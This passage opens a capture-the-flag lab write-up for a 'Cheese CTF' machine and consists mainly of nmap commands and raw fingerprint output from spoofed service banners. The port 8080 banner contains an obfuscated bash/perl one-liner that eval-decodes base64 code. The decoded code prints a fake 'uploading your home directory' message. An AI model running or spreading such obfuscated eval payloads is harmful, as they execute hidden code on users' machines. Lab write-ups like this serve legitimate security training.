Cheese CTF
Inspired by the great cheese talk of THM!
This work by Manav G Krishna is licensed under CC BY-NC 4.0
Machine IP: 10.10.94.254
Hosts file entry: echo '10.10.94.254 cheese.thm' | sudo tee -a /etc/hosts
Nmap Scan:
nmap -p- -A -v --min-rate 100 --open -oN cheese_ctf_thm -Pn cheese.thm
Our traditional scan method shows that a large number of ports are open. We can narrow the Nmap command using the --top-ports switch, like so:
nmap --top-ports 20 -A -v --min-rate 100 --open -oN cheese_ctf_thm -Pn cheese.thm
Nmap scan report for cheese.thm (10.10.94.254)
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp?
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ftp-syst: ERROR: Script execution failed (use -d to debug)
|_ftp-bounce: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|_ 550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00
|_ftp-anon: ERROR: Script execution failed (use -d to debug)
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b1:c1:22:9f:11:10:5f:64:f1:33:72:70:16:3c:80:06 (RSA)
| 256 6d:33:e3:bd:70:62:59:93:4d:ab:8b:fe:ef:e8:a7:b2 (ECDSA)
|_ 256 89:2e:17:84:ed:48:7a:ae:d9:8c:9b:a5:8e:24:04:bd (ED25519)
23/tcp open telnet?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe, tn3270:
|_ 550 12345 0f8008707ff07ff8000008088ff800000000f7000000f800808ff00
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Hello, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
|_ 550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00
|_smtp-commands: SMTP EHLO cheese.thm: failed to receive data: connection closed
53/tcp open domain?
|_dns-nsid: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ 550 4m2v4 FUZZ_HERE
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Cheese Shop
110/tcp open pop3?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ 0rrxabcdefghbslucoahayju
111/tcp open http Network Associates ePolicy Orchestrator 94663073
|_http-server-header: Agent-ListenServer-HttpSvr/1.0
135/tcp open msrpc?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
|_ HTTP/1.1 178 dServer: BearShare 71341 (QyB
139/tcp open http SAP Internet Graphics Server httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title.
|_http-server-header: SAP Internet Graphics Server
143/tcp open http Cryptologic httpd 83
|_http-server-header: WebServer 83
|_http-title: Site doesn't have a title.
|_imap-capabilities: CAPABILITY
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
443/tcp open https?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, Help, NULL, OpenVPN, RPCCheck, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
| Amanda 29097959 NAK HANDLE SEQ 0
|_ ERROR expected "Amanda", got "r
445/tcp open gopher
|_gopher-ls:
993/tcp open imaps?
|_imap-capabilities: CAPABILITY
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
|_ FrontDoor 5qRocCzvX/
995/tcp open http RapidLogic httpd 81184053 (Motorola VT1000v VoIP Adapter http config)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: VT1000v Status
|_http-server-header: RapidLogic/81184053
1723/tcp open pptp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ 00000
3306/tcp open imap Samsung contact imapd 884839
|_mysql-info: ERROR: Script execution failed (use -d to debug)
|_imap-capabilities: CAPABILITY
3389/tcp open ssh (protocol 596906843)
| fingerprint-strings:
| NULL:
|_ SSH-596906843-OpenSSH_XoP-DLI NetBSD_Secure_Shell-mIH
5900/tcp open vnc?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, NULL, RPCCheck, RTSPRequest:
| 0Nhtprggsm0000vqbyxqql
| T*MacBookAir29x05
| AFP3.4
| AFP3.3
| AFP3.2
| AFP3.1
| AFPX03
| DHCAST128
| DHX2
| Recon1
| Client Krb v2
| User Authents
|_ $not_defined_in_RFC4178@please_ignore
8080/tcp open http-proxy?
| fingerprint-strings:
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, NULL, RTSPRequest, Socks4, Socks5:
|_ /bin/bash -c {perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==} $_=$ARGV[0];~s/SPACE/ /ig;eval;$_=$ARGV[1];eval(decode_base64($_));
9 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port21-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(N
SF:ULL,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f7f7008
SF:8000cf00")%r(GenericLines,41,"550\x2012345\x200f7000f800770008777000000
SF:000000000f80008f7f70088000cf00")%r(Help,41,"550\x2012345\x200f7000f8007
SF:70008777000000000000000f80008f7f70088000cf00")%r(GetRequest,41,"550\x20
SF:12345\x200f7000f800770008777000000000000000f80008f7f70088000cf00")%r(HT
SF:TPOptions,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f
SF:7f70088000cf00")%r(RTSPRequest,41,"550\x2012345\x200f7000f8007700087770
SF:00000000000000f80008f7f70088000cf00")%r(RPCCheck,41,"550\x2012345\x200f
SF:7000f800770008777000000000000000f80008f7f70088000cf00")%r(DNSVersionBin
SF:dReqTCP,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f7f
SF:70088000cf00")%r(DNSStatusRequestTCP,41,"550\x2012345\x200f7000f8007700
SF:08777000000000000000f80008f7f70088000cf00")%r(SSLSessionReq,41,"550\x20
SF:12345\x200f7000f800770008777000000000000000f80008f7f70088000cf00")%r(Te
SF:rminalServerCookie,41,"550\x2012345\x200f7000f8007700087770000000000000
SF:00f80008f7f70088000cf00")%r(TLSSessionReq,41,"550\x2012345\x200f7000f80
SF:0770008777000000000000000f80008f7f70088000cf00")%r(Kerberos,41,"550\x20
SF:12345\x200f7000f800770008777000000000000000f80008f7f70088000cf00")%r(SM
SF:BProgNeg,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f7
SF:f70088000cf00")%r(X11Probe,41,"550\x2012345\x200f7000f80077000877700000
SF:0000000000f80008f7f70088000cf00")%r(FourOhFourRequest,41,"550\x2012345\
SF:x200f7000f800770008777000000000000000f80008f7f70088000cf00")%r(LPDStrin
SF:g,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f7f700880
SF:00cf00")%r(LDAPSearchReq,41,"550\x2012345\x200f7000f8007700087770000000
SF:00000000f80008f7f70088000cf00")%r(LDAPBindReq,41,"550\x2012345\x200f700
SF:0f800770008777000000000000000f80008f7f70088000cf00")%r(SIPOptions,41,"5
SF:50\x2012345\x200f7000f800770008777000000000000000f80008f7f70088000cf00"
SF:)%r(LANDesk-RC,41,"550\x2012345\x200f7000f800770008777000000000000000f8
SF:0008f7f70088000cf00")%r(TerminalServer,41,"550\x2012345\x200f7000f80077
SF:0008777000000000000000f80008f7f70088000cf00");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port23-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(N
SF:ULL,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f7000000f80
SF:0808ff00")%r(GenericLines,41,"550\x2012345\x200f8008707ff07ff8000008088
SF:ff800000000f7000000f800808ff00")%r(tn3270,41,"550\x2012345\x200f8008707
SF:ff07ff8000008088ff800000000f7000000f800808ff00")%r(GetRequest,41,"550\x
SF:2012345\x200f8008707ff07ff8000008088ff800000000f7000000f800808ff00")%r(
SF:HTTPOptions,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f70
SF:00000f800808ff00")%r(RTSPRequest,41,"550\x2012345\x200f8008707ff07ff800
SF:0008088ff800000000f7000000f800808ff00")%r(RPCCheck,41,"550\x2012345\x20
SF:0f8008707ff07ff8000008088ff800000000f7000000f800808ff00")%r(DNSVersionB
SF:indReqTCP,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f7000
SF:000f800808ff00")%r(DNSStatusRequestTCP,41,"550\x2012345\x200f8008707ff0
SF:7ff8000008088ff800000000f7000000f800808ff00")%r(Help,41,"550\x2012345\x
SF:200f8008707ff07ff8000008088ff800000000f7000000f800808ff00")%r(SSLSessio
SF:nReq,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f7000000f8
SF:00808ff00")%r(TerminalServerCookie,41,"550\x2012345\x200f8008707ff07ff8
SF:000008088ff800000000f7000000f800808ff00")%r(TLSSessionReq,41,"550\x2012
SF:345\x200f8008707ff07ff8000008088ff800000000f7000000f800808ff00")%r(Kerb
SF:eros,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f7000000f8
SF:00808ff00")%r(SMBProgNeg,41,"550\x2012345\x200f8008707ff07ff8000008088f
SF:f800000000f7000000f800808ff00")%r(X11Probe,41,"550\x2012345\x200f800870
SF:7ff07ff8000008088ff800000000f7000000f800808ff00")%r(FourOhFourRequest,4
SF:1,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f7000000f800808f
SF:f00")%r(LPDString,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000
SF:000f7000000f800808ff00")%r(LDAPSearchReq,41,"550\x2012345\x200f8008707f
SF:f07ff8000008088ff800000000f7000000f800808ff00")%r(LDAPBindReq,41,"550\x
SF:2012345\x200f8008707ff07ff8000008088ff800000000f7000000f800808ff00")%r(
SF:SIPOptions,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f700
SF:0000f800808ff00")%r(LANDesk-RC,41,"550\x2012345\x200f8008707ff07ff80000
SF:08088ff800000000f7000000f800808ff00");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port25-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(N
SF:ULL,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8
SF:088fff00")%r(Hello,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f70
SF:000c70008008ff8088fff00")%r(Help,41,"550\x2012345\x200ff0808800cf0000ff
SF:ff70000f877f70000c70008008ff8088fff00")%r(GenericLines,41,"550\x2012345
SF:\x200ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00")%r(GetRequ
SF:est,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8
SF:088fff00")%r(HTTPOptions,41,"550\x2012345\x200ff0808800cf0000ffff70000f
SF:877f70000c70008008ff8088fff00")%r(RTSPRequest,41,"550\x2012345\x200ff08
SF:08800cf0000ffff70000f877f70000c70008008ff8088fff00")%r(RPCCheck,41,"550
SF:\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00")%
SF:r(DNSVersionBindReqTCP,41,"550\x2012345\x200ff0808800cf0000ffff70000f87
SF:7f70000c70008008ff8088fff00")%r(DNSStatusRequestTCP,41,"550\x2012345\x2
SF:00ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00")%r(SSLSession
SF:Req,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8
SF:088fff00")%r(TerminalServerCookie,41,"550\x2012345\x200ff0808800cf0000f
SF:fff70000f877f70000c70008008ff8088fff00")%r(TLSSessionReq,41,"550\x20123
SF:45\x200ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00")%r(Kerbe
SF:ros,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8
SF:088fff00")%r(SMBProgNeg,41,"550\x2012345\x200ff0808800cf0000ffff70000f8
SF:77f70000c70008008ff8088fff00")%r(X11Probe,41,"550\x2012345\x200ff080880
SF:0cf0000ffff70000f877f70000c70008008ff8088fff00")%r(FourOhFourRequest,41
SF:,"550\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8088fff
SF:00")%r(LPDString,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f7000
SF:0c70008008ff8088fff00")%r(LDAPSearchReq,41,"550\x2012345\x200ff0808800c
SF:f0000ffff70000f877f70000c70008008ff8088fff00")%r(LDAPBindReq,41,"550\x2
SF:012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00")%r(S
SF:IPOptions,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008
SF:008ff8088fff00")%r(LANDesk-RC,41,"550\x2012345\x200ff0808800cf0000ffff7
SF:0000f877f70000c70008008ff8088fff00");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(N
SF:ULL,13,"550\x204m2v4\x20FUZZ_HERE")%r(DNSVersionBindReqTCP,13,"550\x204
SF:m2v4\x20FUZZ_HERE")%r(DNSStatusRequestTCP,13,"550\x204m2v4\x20FUZZ_HERE
SF:")%r(GenericLines,13,"550\x204m2v4\x20FUZZ_HERE")%r(GetRequest,13,"550\
SF:x204m2v4\x20FUZZ_HERE")%r(HTTPOptions,13,"550\x204m2v4\x20FUZZ_HERE")%r
SF:(RTSPRequest,13,"550\x204m2v4\x20FUZZ_HERE")%r(RPCCheck,13,"550\x204m2v
SF:4\x20FUZZ_HERE")%r(Help,13,"550\x204m2v4\x20FUZZ_HERE")%r(SSLSessionReq
SF:,13,"550\x204m2v4\x20FUZZ_HERE")%r(TerminalServerCookie,13,"550\x204m2v
SF:4\x20FUZZ_HERE")%r(TLSSessionReq,13,"550\x204m2v4\x20FUZZ_HERE")%r(Kerb
SF:eros,13,"550\x204m2v4\x20FUZZ_HERE")%r(SMBProgNeg,13,"550\x204m2v4\x20F
SF:UZZ_HERE")%r(X11Probe,13,"550\x204m2v4\x20FUZZ_HERE")%r(FourOhFourReque
SF:st,13,"550\x204m2v4\x20FUZZ_HERE")%r(LPDString,13,"550\x204m2v4\x20FUZZ
SF:_HERE")%r(LDAPSearchReq,13,"550\x204m2v4\x20FUZZ_HERE")%r(LDAPBindReq,1
SF:3,"550\x204m2v4\x20FUZZ_HERE")%r(SIPOptions,13,"550\x204m2v4\x20FUZZ_HE
SF:RE")%r(LANDesk-RC,13,"550\x204m2v4\x20FUZZ_HERE")%r(TerminalServer,13,"
SF:550\x204m2v4\x20FUZZ_HERE")%r(NCP,13,"550\x204m2v4\x20FUZZ_HERE")%r(Not
SF:esRPC,13,"550\x204m2v4\x20FUZZ_HERE")%r(JavaRMI,13,"550\x204m2v4\x20FUZ
SF:Z_HERE")%r(WMSRequest,13,"550\x204m2v4\x20FUZZ_HERE")%r(oracle-tns,13,"
SF:550\x204m2v4\x20FUZZ_HERE")%r(ms-sql-s,13,"550\x204m2v4\x20FUZZ_HERE")%
SF:r(afp,13,"550\x204m2v4\x20FUZZ_HERE")%r(giop,13,"550\x204m2v4\x20FUZZ_H
SF:ERE");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port110-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(
SF:NULL,19,"0rrxabcdefghbslucoahayju\n")%r(GenericLines,19,"0rrxabcdefghbs
SF:lucoahayju\n")%r(GetRequest,19,"0rrxabcdefghbslucoahayju\n")%r(HTTPOpti
SF:ons,19,"0rrxabcdefghbslucoahayju\n")%r(RTSPRequest,19,"0rrxabcdefghbslu
SF:coahayju\n")%r(RPCCheck,19,"0rrxabcdefghbslucoahayju\n")%r(DNSVersionBi
SF:ndReqTCP,19,"0rrxabcdefghbslucoahayju\n")%r(DNSStatusRequestTCP,19,"0rr
SF:xabcdefghbslucoahayju\n")%r(Help,19,"0rrxabcdefghbslucoahayju\n")%r(SSL
SF:SessionReq,19,"0rrxabcdefghbslucoahayju\n")%r(TerminalServerCookie,19,"
SF:0rrxabcdefghbslucoahayju\n")%r(TLSSessionReq,19,"0rrxabcdefghbslucoahay
SF:ju\n")%r(Kerberos,19,"0rrxabcdefghbslucoahayju\n")%r(SMBProgNeg,19,"0rr
SF:xabcdefghbslucoahayju\n")%r(X11Probe,19,"0rrxabcdefghbslucoahayju\n")%r
SF:(FourOhFourRequest,19,"0rrxabcdefghbslucoahayju\n")%r(LPDString,19,"0rr
SF:xabcdefghbslucoahayju\n")%r(LDAPSearchReq,19,"0rrxabcdefghbslucoahayju\
SF:n")%r(LDAPBindReq,19,"0rrxabcdefghbslucoahayju\n")%r(SIPOptions,19,"0rr
SF:xabcdefghbslucoahayju\n")%r(LANDesk-RC,19,"0rrxabcdefghbslucoahayju\n")
SF:%r(TerminalServer,19,"0rrxabcdefghbslucoahayju\n")%r(NCP,19,"0rrxabcdef
SF:ghbslucoahayju\n")%r(NotesRPC,19,"0rrxabcdefghbslucoahayju\n")%r(JavaRM
SF:I,19,"0rrxabcdefghbslucoahayju\n")%r(WMSRequest,19,"0rrxabcdefghbslucoa
SF:hayju\n")%r(oracle-tns,19,"0rrxabcdefghbslucoahayju\n")%r(ms-sql-s,19,"
SF:0rrxabcdefghbslucoahayju\n")%r(afp,19,"0rrxabcdefghbslucoahayju\n")%r(g
SF:iop,19,"0rrxabcdefghbslucoahayju\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port135-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(
SF:NULL,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9
SF:f{\xef\xd3X\)\r\n\n")%r(DNSVersionBindReqTCP,33,"HTTP/1\.1\x20178\x20dS
SF:erver:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(SMBProg
SF:Neg,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f
SF:{\xef\xd3X\)\r\n\n")%r(GenericLines,33,"HTTP/1\.1\x20178\x20dServer:\x2
SF:0BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(GetRequest,33,"H
SF:TTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3
SF:X\)\r\n\n")%r(HTTPOptions,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare
SF:\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(RTSPRequest,33,"HTTP/1\.1\
SF:x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n
SF:")%r(RPCCheck,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x2
SF:0\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(DNSStatusRequestTCP,33,"HTTP/1\.1\x201
SF:78\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r
SF:(Help,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x
SF:9f{\xef\xd3X\)\r\n\n")%r(SSLSessionReq,33,"HTTP/1\.1\x20178\x20dServer:
SF:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(TerminalServe
SF:rCookie,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB
SF:\x9f{\xef\xd3X\)\r\n\n")%r(TLSSessionReq,33,"HTTP/1\.1\x20178\x20dServe
SF:r:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(Kerberos,33
SF:,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\
SF:xd3X\)\r\n\n")%r(X11Probe,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare
SF:\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(FourOhFourRequest,33,"HTTP
SF:/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)
SF:\r\n\n")%r(LPDString,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x207
SF:1341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(LDAPSearchReq,33,"HTTP/1\.1\x20
SF:178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%
SF:r(LDAPBindReq,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x2
SF:0\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(SIPOptions,33,"HTTP/1\.1\x20178\x20dSe
SF:rver:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port443-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(
SF:NULL,47,"Amanda\x2029097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20
SF:expected\x20\"Amanda\",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(SSLSessionR
SF:eq,47,"Amanda\x2029097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20ex
SF:pected\x20\"Amanda\",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(TLSSessionReq
SF:,47,"Amanda\x2029097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expe
SF:cted\x20\"Amanda\",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(SSLv23SessionRe
SF:q,47,"Amanda\x2029097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20exp
SF:ected\x20\"Amanda\",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(X11Probe,47,"A
SF:manda\x2029097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x
SF:20\"Amanda\",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(OpenVPN,47,"Amanda\x2
SF:029097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Aman
SF:da\",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(GenericLines,47,"Amanda\x2029
SF:097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\
SF:",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(GetRequest,47,"Amanda\x202909795
SF:9\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x2
SF:0got\x20\"r\xfe\x1d\x13\"\n\n")%r(HTTPOptions,47,"Amanda\x2029097959\x2
SF:0NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got
SF:\x20\"r\xfe\x1d\x13\"\n\n")%r(RTSPRequest,47,"Amanda\x2029097959\x20NAK
SF:\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got\x20
SF:\"r\xfe\x1d\x13\"\n\n")%r(RPCCheck,47,"Amanda\x2029097959\x20NAK\x20HAN
SF:DLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got\x20\"r\xfe
SF:\x1d\x13\"\n\n")%r(DNSVersionBindReqTCP,47,"Amanda\x2029097959\x20NAK\x
SF:20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got\x20\"
SF:r\xfe\x1d\x13\"\n\n")%r(DNSStatusRequestTCP,47,"Amanda\x2029097959\x20N
SF:AK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got\x
SF:20\"r\xfe\x1d\x13\"\n\n")%r(Help,47,"Amanda\x2029097959\x20NAK\x20HANDL
SF:E\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got\x20\"r\xfe\x
SF:1d\x13\"\n\n")%r(TerminalServerCookie,47,"Amanda\x2029097959\x20NAK\x20
SF:HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got\x20\"r\
SF:xfe\x1d\x13\"\n\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port993-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(
SF:NULL,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205
SF:qRocCzvX/\n")%r(SSLSessionReq,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xf
SF:d0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(TLSSessionReq,25,"\xff\xfb\x03
SF:\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(SSLv2
SF:3SessionReq,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDo
SF:or\x205qRocCzvX/\n")%r(GenericLines,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\
SF:xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(GetRequest,25,"\xff\xfb\
SF:x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(HT
SF:TPOptions,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor
SF:\x205qRocCzvX/\n")%r(RTSPRequest,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff
SF:\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(RPCCheck,25,"\xff\xfb\x03\x
SF:ff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(DNSVers
SF:ionBindReqTCP,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFront
